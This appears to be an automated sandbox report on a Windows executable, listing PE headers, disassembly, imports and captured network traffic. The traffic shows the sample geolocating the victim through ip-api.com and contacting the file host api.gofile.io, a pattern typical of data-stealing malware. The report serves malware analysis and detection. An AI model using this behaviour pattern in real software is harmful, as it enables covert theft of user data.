                                                                                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                              Time Stamp:0x67672483 [Sat Dec 21 20:26:43 2024 UTC]
                                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                                              Import Hash:a06f302f71edd380da3d5bf4a6d94ebd

                                                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                                              call 00007F8430E420DCh
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                                              jmp 00007F8430E41CEFh
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                                              call 00007F8430E42468h
                                                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                                                              je 00007F8430E41EA3h
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                              jmp 00007F8430E41E87h
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                                                                                              je 00007F8430E41E96h
                                                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              cmpxchg dword ptr [000381ACh], ecx
                                                                                                                                                                                                                                                                              jne 00007F8430E41E70h
                                                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                                                              jmp 00007F8430E41E79h
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                                                                                              jne 00007F8430E41E89h
                                                                                                                                                                                                                                                                              mov byte ptr [00038195h], 00000001h
                                                                                                                                                                                                                                                                              call 00007F8430E415C5h
                                                                                                                                                                                                                                                                              call 00007F8430E42880h
                                                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                                                              jne 00007F8430E41E86h
                                                                                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                                                                                              jmp 00007F8430E41E96h
                                                                                                                                                                                                                                                                              call 00007F8430E50D8Fh
                                                                                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                                                                                              jne 00007F8430E41E8Bh
                                                                                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                                                                                              call 00007F8430E42890h
                                                                                                                                                                                                                                                                              jmp 00007F8430E41E6Ch
                                                                                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                                                                                              ret
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              int3
                                                                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                                                                                              cmp byte ptr [0003815Ch], 00000000h
                                                                                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                                                                                              jne 00007F8430E41EE9h
                                                                                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                                                                                              jnbe 00007F8430E41EECh
                                                                                                                                                                                                                                                                              call 00007F8430E423DEh
                                                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                                                              je 00007F8430E41EAAh
                                                                                                                                                                                                                                                                              test ebx, ebx
                                                                                                                                                                                                                                                                              jne 00007F8430E41EA6h
                                                                                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                                                                                              lea ecx, dword ptr [00038146h]
                                                                                                                                                                                                                                                                              call 00007F8430E50B82h

                                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3e9ec0x50.rdata
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000xef8c.rsrc
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x22bc.pdata
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000x768.reloc
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3bfb00x1c.rdata
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3be700x140.rdata
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2d0000x400.rdata
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                              .text0x10000x2b1700x2b200420661550c659f884db561712e500aaeFalse0.5455615942028985data6.498595774489571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                              .rdata0x2d0000x128020x12a00b8a8224d719ff42417f9651a57587042False0.5229262793624161data5.768424648089835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                              .data0x400000x54080xe00aff56347f897785154c53727472c548dFalse0.13504464285714285data1.8315705466577277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                              .pdata0x460000x22bc0x24002411a276649fc67a0a93227155911735False0.4740668402777778data5.334571311334213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                              .rsrc0x490000xef8c0xf0005d72e0338b034862f777c781ab7d2219False0.8010091145833333data7.3501462320035476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                              .reloc0x580000x7680x80042d6242177dbae8e11ed5d64b87d0d48False0.5576171875data5.268722219019965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                              RT_ICON0x492080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.56636460554371
                                                                                                                                                                                                                                                                              RT_ICON0x4a0b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7287906137184116
                                                                                                                                                                                                                                                                              RT_ICON0x4a9580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.7471098265895953
                                                                                                                                                                                                                                                                              RT_ICON0x4aec00x909bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9971636186822983
                                                                                                                                                                                                                                                                              RT_ICON0x53f5c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.38309128630705397
                                                                                                                                                                                                                                                                              RT_ICON0x565040x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4826454033771107
                                                                                                                                                                                                                                                                              RT_ICON0x575ac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.699468085106383
                                                                                                                                                                                                                                                                              RT_GROUP_ICON0x57a140x68data0.7019230769230769
                                                                                                                                                                                                                                                                              RT_MANIFEST0x57a7c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                                              USER32.dllTranslateMessage, ShutdownBlockReasonCreate, GetWindowThreadProcessId, SetWindowLongPtrW, GetWindowLongPtrW, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, CreateWindowExW, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, GetMessageW
                                                                                                                                                                                                                                                                              KERNEL32.dllGetTimeZoneInformation, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetStringTypeW, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, HeapSize, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, GetConsoleWindow, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetDriveTypeW, IsDebuggerPresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetModuleHandleW, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableW
                                                                                                                                                                                                                                                                              ADVAPI32.dllConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW

                                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.965157986 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.965203047 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.965280056 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.966017008 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.966028929 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.364761114 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.365489960 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.365547895 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.367736101 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.367825031 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.369378090 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.369478941 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.369514942 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.411374092 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.414505005 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.414527893 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:41.461118937 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:42.173892975 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:42.173994064 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:42.174046040 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:42.174772978 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.800472021 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.920254946 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.920475006 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.920789957 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:44.040281057 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.035140038 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.036051989 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.039025068 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.155976057 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.156075954 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.158874989 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.158971071 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.159126997 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.278577089 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:49.370474100 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:49.371241093 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:49.497462034 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:49.497793913 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:50.959583044 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:50.959682941 CET4434973645.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:50.959768057 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:50.960199118 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:50.960237026 CET4434973645.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.368767023 CET4434973645.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.370176077 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.370220900 CET4434973645.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.375655890 CET4434973645.112.123.126192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.375736952 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.377130032 CET49736443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:55.377255917 CET49736443192.168.2.445.112.123.126

                                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.723114967 CET5755053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.935451984 CET53575501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.662744999 CET6047353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.799485922 CET53604731.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.723114967 CET192.168.2.41.1.1.10xcd19Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.662744999 CET192.168.2.41.1.1.10xa906Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:39.935451984 CET1.1.1.1192.168.2.40xcd19No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.799485922 CET1.1.1.1192.168.2.40xa906No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                              • api.gofile.io
                                                                                                                                                                                                                                                                              • ip-api.com

                                                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              0192.168.2.449732208.95.112.1807680C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:43.920789957 CET156OUTGET /json/ HTTP/1.1
                                                                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                                                                              User-Agent: python-requests/2.32.3
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.035140038 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 20:51:44 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                              Content-Length: 306
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              1192.168.2.449733208.95.112.1807680C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:45.159126997 CET182OUTGET /json/8.46.123.189?fields=192511 HTTP/1.1
                                                                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                                                                              User-Agent: python-requests/2.32.3
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Dec 21, 2024 21:51:49.370474100 CET497INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 20:51:48 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                              Content-Length: 320
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              X-Ttl: 60
                                                                                                                                                                                                                                                                              X-Rl: 44
                                                                                                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              0192.168.2.44973145.112.123.1264437680C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-21 20:51:41 UTC124OUTGET /servers HTTP/1.1
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Host: api.gofile.io
                                                                                                                                                                                                                                                                              User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-21 20:51:42 UTC1116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx/1.27.1
                                                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 20:51:41 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                              Content-Length: 461
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                              Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                              Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                                              ETag: W/"1cd-0mADn2yhHeGiiS5ZLxVpVtECWFo"
